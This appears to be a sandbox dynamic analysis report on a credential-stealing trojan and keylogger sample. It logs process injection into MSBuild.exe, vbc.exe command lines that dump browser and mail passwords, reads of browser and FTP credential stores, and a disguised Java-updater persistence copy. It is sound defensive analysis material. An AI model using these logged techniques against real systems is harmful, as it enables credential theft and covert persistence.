b77b82fa...2607 | Grouped Behavior
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Keylogger, Spyware, Trojan

Monitored Processes

Process Overview
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xa60 Analysis Target High (Elevated) gmmqacgpk.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe" -
#2 0xb18 Child Process High (Elevated) msbuild.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" #1
#4 0xbf8 Child Process High (Elevated) vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe -f C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt #2
#5 0x594 Child Process High (Elevated) vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt #2
#7 0x4e8 Autostart Medium javaupdtr.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe" -
#8 0x708 Child Process Medium msbuild.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" #7
#9 0x718 Child Process Medium msbuild.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" #7

Behavior Information - Grouped by Category

Process #1: gmmqacgpk.exe
Information Value
ID #1
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:26, Reason: Analysis Target
Unmonitor End Time: 00:00:36, Reason: Self Terminated
Monitor Duration 00:00:10
OS Process Information
Information Value
PID 0xa60
Parent PID 0x45c (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xA64, 0xA74, 0xA78, 0xA7C, 0xA80, 0xA84, 0xB20, 0xB24, 0xB30, 0xB34
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
system.drawing.ni.dll 0x747F0000 0x74977FFF Content Changed - 32-bit 0x74843870, 0x74828140 False False
system.drawing.ni.dll 0x747F0000 0x74977FFF Content Changed - 32-bit 0x7483BB90, 0x74839940 False False
system.drawing.ni.dll 0x747F0000 0x74977FFF Content Changed - 32-bit 0x7483FEDC, 0x74827478, ... False False
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F386A0, 0x73F37A6C, ... False False
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F8A650, 0x73E891D0, ... False False
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F3A025, 0x73F39DF8, ... False False
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F4FC90 False False
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F4C0FC False False
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F33B94, 0x73F53EB4, ... False False
microsoft.visualbasic.ni.dll 0x73E60000 0x73FFAFFF Content Changed - 32-bit 0x73F7F441, 0x73F4AADE, ... False False
system.drawing.ni.dll 0x747F0000 0x74977FFF Content Changed - 32-bit 0x7483A7F0, 0x74831FAC False False
Dropped Files
Filename File Size Hash Values YARA Match
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp 51 bytes
MD5: 112a15fe8f0812fb5b44e44f1b5a8df2
SHA1: fa53bc2d594d4a1307176406fe4c4b63f01607ae
SHA256: fb83cd90872a11a04c5df9734833cf8e0e4adf6af25d9ded59dcbae3e77dfccf
SSDeep: 3:oNBiTktGaACIIUvJLACn:oNUTk4FC1URLNn
YARA Match: False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp 64 bytes
MD5: 8298bd7dd49a941d4f9dee3f49df4857
SHA1: 8820f66e7123fdfae68c1a049286576c5c58910c
SHA256: 0bba49534b921bcfc1b5f71926165f357add38b22a48763d946d55e4e8ab46db
SSDeep: 3:oNBiTktG+Vh4EaKC5cEcTrkCn:oNUTk4aJaZ5cTTrkCn
YARA Match: False
Host Behavior
File (4)
Operation Filename Additional Information Success Count
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp type = file_type True 2
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp size = 51 True 1
Process (1)
Operation Process Additional Information Success Count
Create C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe os_pid = 0xb18, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Thread (3)
Operation Process Additional Information Success Count
Get Context c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe os_tid = 0xa64 True 1
Set Context c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe os_tid = 0xa64 True 1
Resume c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe os_tid = 0xa64 True 1
Memory (7)
Operation Process Additional Information Success Count
Allocate C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe address = 4194304, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 360448 True 1
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe address = 2130567176, size = 4 True 1
Write C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe address = 0x400000, size = 512 True 1
Write C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe address = 0x402000, size = 328704 True 1
Write C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe address = 0x454000, size = 1536 True 1
Write C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe address = 0x456000, size = 512 True 1
Write C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe address = 0x7efde008, size = 4 True 1
Module (306)
Operation Module Additional Information Success Count
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 9
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 9
User (1)
Operation Additional Information Success Count
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
System (2)
Operation Additional Information Success Count
Get Info type = Operating System True 2
Environment (2)
Operation Additional Information Success Count
Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Get Environment String name = windir, result_out = C:\Windows True 1
Process #2: msbuild.exe
Information Value
ID #2
File Name c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe
Command Line "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:34, Reason: Child Process
Unmonitor End Time: 00:01:16, Reason: Self Terminated
Monitor Duration 00:00:41
OS Process Information
Information Value
PID 0xb18
Parent PID 0xa60 (c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xB1C, 0xB28, 0xB2C, 0xB38, 0xB3C, 0xB40, 0xB44, 0xB7C, 0xB80, 0xB84, 0xB88, 0xB90, 0xB94, 0xBB8, 0xBBC, 0xBC0, 0xBC4, 0xBC8
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
custommarshalers.ni.dll 0x74750000 0x74789FFF Content Changed - 32-bit 0x74770E64 False False
custommarshalers.ni.dll 0x74750000 0x74789FFF Content Changed - 32-bit 0x74775920 False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73B3E3B8 False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BA5380 False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73B9C558, 0x73B3D8EC False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BA94F0, 0x73BA01D0 False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BA8E08, 0x73BD4B38 False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BA2800, 0x73BD535C, ... False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BDCDC4 False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BD5000, 0x73BDE000, ... False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BE9590, 0x73BA4000 False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73B9E2A0 False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BAB320 False False
system.management.ni.dll 0x73B20000 0x73C23FFF Content Changed - 32-bit 0x73BAB000, 0x73BAAF84, ... False False
buffer 0x006D0000 0x006D0FFF First Execution - 32-bit 0x006D01BC, 0x006D0DD8, ... False False
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A4D073 False False
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A4E149 False False
system.xml.ni.dll 0x72480000 0x729B5FFF Content Changed - 32-bit 0x728E650B False False
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A50050 False False
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A51000 False False
system.configuration.ni.dll 0x73A20000 0x73B10FFF Content Changed - 32-bit 0x73A48650, 0x73A4A320, ... False False
buffer 0x000F8000 0x000F8FFF First Execution - 32-bit 0x000F85F8 False False
buffer 0x00332000 0x00332FFF First Execution - 32-bit 0x003324E0 False False
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x400000, size = 512 True 1
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x402000, size = 328704 True 1
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x454000, size = 1536 True 1
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x456000, size = 512 True 1
Modify Memory #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 address = 0x7efde008, size = 4 True 1
Modify Control Flow #1: c:\users\5p5nrgjn0js halpmcxz\desktop\gmmqacgpk.exe 0xa64 os_tid = 0xb1c, address = 0x0 True 1
Dropped Files
Filename File Size Hash Values YARA Match
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe 692.00 KB
MD5: e4117e6974363cac8b37e5e3ff5d07a6
SHA1: 74a02a421e029d24a1d2c692df28a90296d052d0
SHA256: b77b82fa96b676790b9a207d8208d90ace3a0922d5db5938c446cd22e9132607
SSDeep: 12288:3qPSBEsVqSI0TjVMB2rdet1pEpWI8c8J:8eHVqSmUr0HipF8x
YARA Match: False
Host Behavior
COM (19)
Operation Class Interface Additional Information Success Count
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 2
Create WbemDefaultPathParser IWbemPath cls_context = CLSCTX_INPROC_SERVER True 3
Create WbemDefaultPathParser IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 5
Create WBEMLocator IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Create WScript.Shell IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 6
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\.\root\cimv2 True 1
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\.\root\cimv2 True 1
File (95)
Operation Filename Additional Information Success Count
Create C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Create C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\profiles.ini desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 2
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\CoreFTP\sites.idx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\FileZilla\recentservers.xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Create Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java - True 1
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config type = file_attributes True 1
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = file_attributes True 2
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config type = file_type True 2
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config type = file_attributes True 3
Get Info C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config type = file_type True 2
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp type = file_type True 2
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\ type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming type = file_attributes True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData type = file_attributes True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz type = file_attributes True 1
Get Info C:\Users type = file_attributes True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe type = file_attributes True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data type = file_attributes True 3
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data type = file_type True 2
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\profiles.ini type = file_type True 2
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\logins.json type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Opera Software\Opera Stable\Login Data type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt type = file_attributes False 2
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt type = file_attributes True 2
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt type = file_type True 2
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Comodo\Dragon\User Data\Default\Login Data type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data type = file_attributes False 1
Get Info C:\Chromium\User Data\Default\Login Data type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt type = file_attributes False 7
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt type = file_attributes True 3
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt type = file_type True 4
Get Info C:\ProgramData\DynDNS\Updater\config.dyndns type = file_attributes False 1
Get Info C:\Users\All Users\AppData\Roaming\FlashFXP\3quick.dat type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\.purple\accounts.xml type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Ftplist.txt type = file_attributes False 1
Get Info C:\Program Files (x86)\jDownloader\config\database.script type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Explorer.txt type = file_attributes False 1
Copy C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe True 1
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 6
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 237 True 1
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 0 True 1
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config size = 4096, size_out = 559 True 1
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config size = 4096, size_out = 0 True 1
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp size = 4096, size_out = 51 True 1
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp size = 4096, size_out = 0 True 1
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data size = 18432, size_out = 18432 True 1
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\profiles.ini size = 4096, size_out = 111 True 1
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\profiles.ini size = 4096, size_out = 0 True 1
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt size = 4096, size_out = 389 True 1
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt size = 4096, size_out = 0 True 1
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt size = 4096, size_out = 475 True 2
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt size = 4096, size_out = 0 True 2
Delete C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt - True 1
Delete C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt - True 1
Registry (46)
Operation Key Additional Information Success Count
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance - True 1
Open Key HKEY_CURRENT_USER - True 1
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Open Key HKEY_CURRENT_USER\Software\Paltalk - False 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC - False 2
Open Key HKEY_CURRENT_USER\SOFTWARE\Vitalwerks\DUC - False 2
Open Key HKEY_CURRENT_USER\Software\DownloadManager\Passwords - False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting value_name = Default Impersonation Level, data = 3 True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting value_name = Default Namespace True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting value_name = Default Namespace, data = 114 True 1
